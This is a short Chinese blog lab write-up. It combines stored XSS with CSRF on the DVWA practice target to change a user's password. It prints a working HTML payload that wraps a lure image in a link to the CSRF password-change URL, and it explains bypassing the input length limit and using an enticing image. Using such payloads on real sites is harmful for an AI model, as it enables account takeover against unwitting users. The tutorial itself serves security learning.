XSS+CSRF攻击

一、前言

在DVWA靶场的XSS攻击下结合CSRF攻击完成修改密码

也就是在具有XSS漏洞的情况下实施CSRF攻击

二、实验

环境配置与上一篇博客一致,有兴趣可以参考CSRF跨站请求伪造实战-CSDN博客

首先登录DVWA,打开XSS模块

name随便输入,message输入我们构造的payload

<a href="http://192.168.43.186/dvwa/vulnerabilities/csrf/?password_new=111111&password_conf=111111&Change=Change"><img src="http://192.168.43.148/lufei.jpg"></a>

这块代码由上一篇博客介绍,这里大概说明一下。

我们构造的payload是用于修改登录密码,在页面插入一张图片,诱导用户点击之后,攻击也就完成,用户的密码会修改为我们定义的密码,上面的111111

此时的前端限制输入长度,按F12修改一下

点击提交之后得到以下内容

图片可以换成具有诱导性的图片,当用户点击图片之后会跳转到页面,提示密码修改完成

实验结束,若有不准确的地方欢迎指导!

  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值